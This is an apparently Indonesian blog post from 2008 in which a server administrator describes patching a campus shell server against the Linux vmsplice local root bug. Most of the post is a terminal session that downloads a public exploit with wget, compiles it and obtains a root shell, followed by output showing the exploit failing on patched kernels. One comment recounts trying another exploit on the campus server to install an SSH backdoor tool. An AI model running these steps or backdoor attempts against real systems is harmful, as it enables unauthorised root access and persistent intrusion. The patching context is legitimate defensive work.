Senin, Juni 23, 2008

Exploit vmsplice work di Kernel Linux

Assalamu'alaikum Wr. Wb
Karena di beritahu oleh my_bugs_is_secret aka xx_user (bener ngak neh hehehhee) bahwa server shell kampus bisa di exploit kernelnya karena bug vmsplice, akhirnya saya update kernel nya.
Sebelumnya saya yakin dengan security dari mbak debby ini :D, namun ternyata masih bermasalah juga. Dari beberapa mesin yang ada sepertinya ada masalah di update security yang saya arahkan ke kambing. Setelah saya ubat apt/source.list nya ke situs debian. Akhirnya kembali OK.

Apa itu vmsplice, penjelasan dari Linus adalah sebagai berikut,
   vmsplice() system call to basically do a "write to the buffer", but 
using the reference counting and VM traversal to actually fill the
buffer. This means that the user needs to be careful not to re-use the
user-space buffer it spliced into the kernel-space one (contrast this
to "write()", which copies the actual data, and you can thus re-use the
buffer immediately after a successful write), but that is often easy to
do.
Cerita selengkapnya ada di sini , pembicaraan vmsplice pernah menjadi hal yang menarik karena posting dari Linux yang menyebut orang-orang BSD sebagai orang yang idiot hehehe, berita ini masih sy bookmark di FF, selengkapnya cek disini

Oh ya untuk mencoba exploit ini silahkan di coba seperti di bawah ini :

wa2n@shell:~$ wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
--15:55:59--  http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
           => `27704.c'
Resolving downloads.securityfocus.com... 205.206.231.23
Connecting to downloads.securityfocus.com|205.206.231.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,264 (6.1K) [text/plain]

100%[================================================================================================>] 6,264        917.00B/s    ETA 00:00

15:56:14 (916.71 B/s) - `27704.c' saved [6264/6264]

wa2n@shell:~$ gcc -static -Wno-format 27704.c -o root_expl
wa2n@shell:~$ ./root_expl
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f79000 .. 0xb7fab000
[+] root
root@shell:~#

Setelah saya update security nya   dengan wajig :D


wa2n@shell:~$ ./root_expl
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f33000 .. 0xb7f65000
[-] vmsplice: Bad address


Exploit tidak berjalan di kernel berikut, bisa karena dah terupdate secuirty nya ke debian :D

wa2n@wwwserv:~$ uname -a
Linux wwwserv 2.6.18-6-amd64 #1 SMP Thu May 8 09:20:56 UTC 2008 x86_64 GNU/Linux

wa2n@wwwserv:~$ ./root_expl
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xf7f29000 .. 0xf7f5b000
[-] wtf

Ok begitu kejadiannya, terima kasih buat warnning nya dan buat rekan yang lain mungkin sebaiknya point kan security ke debian jangan ke mirrornya sapa tahu mirrornya lagi pecah hehehehhe ........


Semoga bermanfaat
Wassalamu'alikum Wr. Wb



Blogged with the Flock Browser

3 komentar:

xx_user aka my_is_bugs_secret aka ^no-body^ mengatakan...

hehehehe, nick cybernya udah bener dua2nya pak :)

sudah banyak di google fix bugs kernel buat kernel 2.6.17 sampe 2.6.24

mungkin ada 1 lagi exploit yang saya punya, exploit ini dapat berjalan di berbagai macam jenis kernel (2.4, 2.6). namun sifatnya hanya fake(palsu) jadi acces root yang didapat hanya root palsu, tujuannya untuk menjalankan tool sshdoor.tar.gz yaitu tool untuk membuat port ssh sendiri (selain port 22) sayangnya, saya masih belum dapat source code dari exploit tersebut. nah kmaren saya coba pada shell kampus, exploit tersebut dapat berjalan, namun pada configurasi kernel kampus, dilarang untuk membuka port, jadi exploit ini tidak dapat berjalan sempurna :)


kiranya sekian dulu informasi dari saya, makasih buat Pak wa2n yang udah masukin nick cyber saya di web ini :)

hollerithx mengatakan...

yeah .. that's right ...
root local exploit they said or whatever lah ..

ssh on debian based, fix that's bug !!

@^no-body^

many source can u find on google !!!!

xx_user mengatakan...

haehaehae do You know me hollerithx ???
why me dont know you? -,-!


Me is Stupid, ane me is nob0dy. I dont Like root :)

Good Luck hollerithx :)